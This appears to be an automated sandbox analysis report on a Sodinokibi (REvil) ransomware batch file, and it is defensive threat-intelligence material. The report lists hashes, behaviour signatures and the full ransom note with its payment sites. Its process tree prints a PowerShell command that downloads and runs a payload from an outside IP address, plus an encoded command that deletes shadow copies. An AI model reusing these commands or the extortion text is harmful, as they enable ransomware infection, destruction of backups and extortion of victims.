Analysis

  • max time kernel
    134s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    05-06-2020 13:10

General

  • Target

    b84c5ee27ddebb86958f6d6a06c0d157.bat

  • Size

    215B

  • MD5

    3fb4882cf9ed9ae348a4f6778326213f

  • SHA1

    d0232b07da1053d045511423371421f57c148d1f

  • SHA256

    16197944f910a1ec6485dcb92730374511c7e560e0b78ba3c6410e5238ba6f0e

  • SHA512

    fabe93e067bf0541b1f03d910f9dd07f4c5408f6922c1d736dec551646a1118deee24df1a8d77c74951d58f0260056600c2ec82b397251940f3869a39e87ed60

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/b84c5ee27ddebb86958f6d6a06c0d157

Extracted

Path

C:\n22qm-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension n22qm. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/604AEF53B402A9A5 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/604AEF53B402A9A5 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: N3br9ST7Db9dUslLH9oy+94Q3SH5pjrYMtGFHrtIAM3KX4fibL7mes72/GyiR9cw qCVqdi0+NhnEDZmmosMbUJLXqrZWFA4jYFVyPlyAHx0yxrvb9buuOvXchiOH4JzT UATZ6s7lkfe3zcfyaCiiA3CUWJmdylsKSS15PahZ+e8bDogG6LCcO6vIZYmPwM8g /Vwh7kiOOgwu075ifkIzJ6pnp/e7YXCl/clBTFtWxd9UzxOQWxBME5IqQ3tK1bXl FqQH6s3ZpCnd1IrHmFctbVM9rU5JuOSgAN5q6+L9BuNHl0siViqifq1wIEcSRkpk WGccuRWjZgTOEezxdCaCBSEd2DislDPkDdj6wS0fOAoiP3We4xUQbpzl/Ii6euYV SpSVWECMIvsc51PYgWITr/PMGim1P6Lf4dtGc7hbzH/98RKaTxqHJlAxSKbvk31u ndVHJSIDwhhb0DVPNS29CGLuWGDXQxQThGt/rK1Mvoedqb6G0cjMNYd5Xa8E8COZ 6oGZaeAY/svLmai9ICDo49ntNUecRlUNyln1lbicjX99kuqFUQeGs3V++//pq36/ /OsSATk6AOd1YqI8JUFSIsEdZ8AvxB1CYuwAhUdwPkIwiYPbbKdXkUORMFKzg3eQ 9qH55B+mvrFimUVd8Fe5NQnMdvta4e/zC5T3nZMNx/4docIbf1RfhHsBPkOy3JQp S9HW8nFKbKMjGVVlc0lr2ST+qoiAmDiNP07TEd/V79w3jpbIsqSoX7FzEfDY3eU+ mYqYMBjiJiSP2gc6uBkqth/mJSbl9Gto0eOo6TsaLPd3PYn+EhRFyYSPFmA8+LfE 2pLui5j42hQdf8GxS9ToOuOYhjJxu5hkJfHytEI0HvD+DHVVCgBpibtqCrf8yOc6 hKFvLvt3vbYS2z208etK0o2cohIecXBUNPV+WT+qtdcLlOlu0X6HIqYjhVFG+DVk 0/oDMEpHTDCi/H2Dd2ecEJcdfGQpDzIOU8FlxyjraRRIzoC1CzOVGsh/3+gCEIl2 Mgxl0KId/Cz+B0869XrJOhQ5ltC8SXUSEV9sorjjb55Mhd4ErmtnK/lDWAC4cTjG CZwlbWBldYiI5OXUSdFZ35a3TotQgGQCNLVqNw+/OWlUHpZo+77rQyT6i/qrfbHy sDFJ+WnlpcIjk2HiDFvS1FZjx57axaCCMfUC3UCnjq7EzIWnHGjbm8fOAuELgxwK E2lvTPsGt71aGcqY4IgdcW8w5F051+bSm5+zq0F8UM6i9xYCwXyJdAjSac0TXOqf dXGnjojv4quWZlUiSxwmyX8WMh9gBeUlEPnXXMWY ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/604AEF53B402A9A5

http://decryptor.cc/604AEF53B402A9A5

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Blacklisted process makes network request 98 IoCs
  • Drops file in Program Files directory 23 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\b84c5ee27ddebb86958f6d6a06c0d157.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1432
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b84c5ee27ddebb86958f6d6a06c0d157');Invoke-VKIADKNT;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      PID:644
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1852
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1588

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms